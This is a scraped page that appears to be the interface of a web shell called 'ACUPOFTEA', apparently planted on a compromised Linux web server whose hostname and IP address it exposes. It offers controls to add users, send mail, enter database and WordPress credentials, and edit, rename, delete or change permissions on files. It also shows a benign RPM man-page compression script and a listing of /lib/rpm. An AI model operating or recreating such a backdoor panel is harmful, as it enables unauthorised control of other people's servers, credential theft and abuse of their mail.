System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
rpm
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
brp-scl-compress
#!/bin/sh # If using normal root, avoid changing anything. if [ -z "$RPM_BUILD_ROOT" -o "$RPM_BUILD_ROOT" = "/" ]; then exit 0 fi scl_path=${1:-opt/*} cd "$RPM_BUILD_ROOT" # Compress man pages COMPRESS="gzip -9 -n" COMPRESS_EXT=.gz for d in ./usr/man/man* ./usr/man/*/man* ./usr/info \ ./usr/share/man/man* ./usr/share/man/*/man* ./usr/share/info \ ./usr/kerberos/man ./usr/X11R6/man/man* ./usr/lib/perl5/man/man* \ ./usr/share/doc/*/man/man* ./usr/lib/*/man/man* \ ./$scl_path/usr/man/man* ./$scl_path/usr/man/*/man* ./$scl_path/usr/info \ ./$scl_path/usr/share/man/man* ./$scl_path/usr/share/man/*/man* ./$scl_path/usr/share/info \ ./$scl_path/usr/kerberos/man ./$scl_path/usr/X11R6/man/man* ./$scl_path/usr/lib/perl5/man/man* \ ./$scl_path/usr/share/doc/*/man/man* ./$scl_path/usr/lib/*/man/man* do [ -d $d ] || continue for f in `find $d -type f ! -name dir` do [ -f "$f" ] || continue case "$f" in *.gz|*.Z) gunzip -f $f; b=`echo $f | sed -e 's/\.\(gz\|Z\)$//'`;; *.bz2) bunzip2 -f $f; b=`echo $f | sed -e 's/\.bz2$//'`;; *.xz|*.lzma) unxz -f $f; b=`echo $f | sed -e 's/\.\(xz\|lzma\)$//'`;; *) b=$f;; esac $COMPRESS $b </dev/null 2>/dev/null || { inode=`ls -i $b | awk '{ print $1 }'` others=`find $d -type f -inum $inode` if [ -n "$others" ]; then for afile in $others ; do [ "$afile" != "$b" ] && rm -f $afile done $COMPRESS -f $b for afile in $others ; do [ "$afile" != "$b" ] && ln $b$COMPRESS_EXT $afile$COMPRESS_EXT done else $COMPRESS -f $b fi } done for f in `find $d -type l` do l=`ls -l $f | sed -e 's/.* -> //' -e 's/\.\(gz\|Z\|bz2\|xz\|lzma\)$//'` rm -f $f b=`echo $f | sed -e 's/\.\(gz\|Z\|bz2\|xz\|lzma\)$//'` ln -sf $l$COMPRESS_EXT $b$COMPRESS_EXT done done
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-12-18 10:57:28
..
DIR
-
dr-xr-xr-x
2025-09-30 10:57:16
fileattrs
DIR
-
drwxr-xr-x
2024-12-17 04:11:04
macros.d
DIR
-
drwxr-xr-x
2025-10-13 10:57:15
platform
DIR
-
drwxr-xr-x
2024-12-17 04:11:02
redhat
DIR
-
drwxr-xr-x
2025-08-28 10:59:25
brp-scl-compress
text/x-shellscript
1.77 KB
-rwxr-xr-x
2017-08-25 08:23:02
brp-scl-python-bytecompile
text/x-shellscript
3.04 KB
-rwxr-xr-x
2017-08-25 08:23:02
kabi.sh
text/x-shellscript
468 B
-rwxr-xr-x
2023-04-06 08:55:45
kmod.prov
text/x-shellscript
682 B
-rwxr-xr-x
2023-04-06 08:55:45
macros
text/plain
42.96 KB
-rw-r--r--
2024-12-17 04:11:02
python-macro-helper
text/x-python
634 B
-rw-r--r--
2024-12-17 04:11:01
pythondeps.sh
text/x-shellscript
921 B
-rwxr-xr-x
2023-03-31 03:44:53
pythondistdeps.py
text/x-python
10.92 KB
-rwxr-xr-x
2023-03-31 03:44:53
rpm.daily
text/x-shellscript
296 B
-rw-r--r--
2024-12-17 04:11:01
rpm.log
text/plain
61 B
-rw-r--r--
2024-12-17 04:11:01
rpm.supp
text/plain
688 B
-rw-r--r--
2024-12-17 04:11:01
rpm2cpio.sh
text/x-shellscript
1.22 KB
-rwxr-xr-x
2024-12-17 04:11:01
rpmdb_dump
application/x-sharedlib
16.51 KB
-rwxr-xr-x
2021-09-21 04:38:10
rpmdb_load
application/x-sharedlib
28.61 KB
-rwxr-xr-x
2021-09-21 04:38:10
rpmdb_loadcvt
text/x-shellscript
1.43 KB
-rwxr-xr-x
2024-12-17 04:11:01
rpmdb_recover
application/x-sharedlib
16.51 KB
-rwxr-xr-x
2021-09-21 04:38:10
rpmdb_stat
application/x-sharedlib
16.48 KB
-rwxr-xr-x
2021-09-21 04:38:10
rpmdb_upgrade
application/x-sharedlib
12.45 KB
-rwxr-xr-x
2021-09-21 04:38:10
rpmdb_verify
application/x-sharedlib
16.46 KB
-rwxr-xr-x
2021-09-21 04:38:10
rpmpopt-4.14.3
text/plain
11.2 KB
-rw-r--r--
2024-12-17 04:11:02
rpmrc
text/plain
16.75 KB
-rw-r--r--
2024-12-17 04:11:02
scldeps.sh
text/x-shellscript
254 B
-rwxr-xr-x
2017-08-25 08:23:02
tgpg
text/x-shellscript
929 B
-rwxr-xr-x
2024-12-17 04:11:01
~ ACUPOFTEA - mail.ontime-ae.com